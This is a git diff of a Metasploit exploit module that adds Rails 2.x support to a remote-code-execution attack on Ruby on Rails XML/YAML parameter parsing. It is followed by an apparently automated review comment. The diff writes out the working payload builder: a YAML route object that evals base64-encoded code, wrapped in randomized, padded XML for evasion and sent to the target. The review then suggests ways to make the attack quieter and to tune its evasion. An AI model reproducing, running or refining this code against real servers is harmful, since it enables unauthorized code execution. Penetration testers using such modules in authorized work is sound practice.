Merge in Rails2 support now that its in master
parent
bf013ba65f
commit
42ea64c21b
|
@ -22,9 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
an attacker to instantiate a remote object, which in turn can be used to execute
|
an attacker to instantiate a remote object, which in turn can be used to execute
|
||||||
any ruby code remotely in the context of the application.
|
any ruby code remotely in the context of the application.
|
||||||
|
|
||||||
This module has been tested across multiple versions of RoR 3.x, but does not yet
|
This module has been tested across multiple versions of RoR 3.x and RoR 2.x
|
||||||
work against 2.x versions of RoR.
|
|
||||||
|
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
@ -85,7 +83,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
# Create the YAML document that will be embedded into the XML
|
# Create the YAML document that will be embedded into the XML
|
||||||
#
|
#
|
||||||
def build_yaml
|
def build_yaml_rails2
|
||||||
|
|
||||||
|
# Embed the payload with the detached stub
|
||||||
|
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
|
||||||
|
yaml =
|
||||||
|
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
|
||||||
|
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
|
||||||
|
"eval(%[#{code}].unpack(%[m0])[0]);' " +
|
||||||
|
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
|
||||||
|
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
|
||||||
|
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
|
||||||
|
yaml
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
#
|
||||||
|
# Create the YAML document that will be embedded into the XML
|
||||||
|
#
|
||||||
|
def build_yaml_rails3
|
||||||
|
|
||||||
# Embed the payload with the detached stub
|
# Embed the payload with the detached stub
|
||||||
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
|
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
|
||||||
|
@ -101,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
# Create the XML wrapper with any desired evasion
|
# Create the XML wrapper with any desired evasion
|
||||||
#
|
#
|
||||||
def build_request
|
def build_request(v)
|
||||||
xml = ''
|
xml = ''
|
||||||
|
|
||||||
elo = Rex::Text.rand_text_alpha(rand(12)+4)
|
elo = Rex::Text.rand_text_alpha(rand(12)+4)
|
||||||
|
@ -120,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
el = Rex::Text.rand_text_alpha(rand(12)+4)
|
el = Rex::Text.rand_text_alpha(rand(12)+4)
|
||||||
xml << "<#{el} type='yaml'>"
|
xml << "<#{el} type='yaml'>"
|
||||||
xml << build_yaml
|
xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
|
||||||
xml << "</#{el}>"
|
xml << "</#{el}>"
|
||||||
|
|
||||||
if datastore['XML::PadElement']
|
if datastore['XML::PadElement']
|
||||||
|
@ -142,13 +158,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Send the actual request
|
# Send the actual request
|
||||||
#
|
#
|
||||||
def exploit
|
def exploit
|
||||||
data = build_request
|
|
||||||
print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...")
|
print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => datastore['URIPATH'] || "/",
|
'uri' => datastore['URIPATH'] || "/",
|
||||||
'method' => datastore['HTTP_METHOD'],
|
'method' => datastore['HTTP_METHOD'],
|
||||||
'ctype' => 'application/xml',
|
'ctype' => 'application/xml',
|
||||||
'data' => data,
|
'data' => build_request(3)
|
||||||
|
}, 25)
|
||||||
|
handler
|
||||||
|
|
||||||
|
print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => datastore['URIPATH'] || "/",
|
||||||
|
'method' => datastore['HTTP_METHOD'],
|
||||||
|
'ctype' => 'application/xml',
|
||||||
|
'data' => build_request(2)
|
||||||
}, 25)
|
}, 25)
|
||||||
handler
|
handler
|
||||||
end
|
end
|
||||||
|
|
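Review bot: In the new `exploit` body the Rails 2 request is fired unconditionally after the Rails 3 one, so a host that already executed the first payload receives a second, noisy YAML-in-XML request (and may spawn a second session); after the first `handler` call add `return if session_created?` before the `print_status("Sending Railsv2 request ...")` line. Both `res = send_request_cgi(...)` assignments are never read, so either drop the assignment or use the response (e.g. a non-nil `res` with an error status from the mismatched document) to decide whether the other variant is worth sending. The removed `print_status("Sending #{data.length} bytes ...")` line was the only place the request size was reported, which matters when tuning `XML::PadElement` evasion; consider re-adding it per request. `build_request(v)` switches on a bare integer through a ternary; a named parameter such as `def build_request(rails_version)` with an explicit `case rails_version when 2 ... else ...` would document the contract better, and is still one of the ways to keep the two `build_yaml_rails*` helpers from drifting apart.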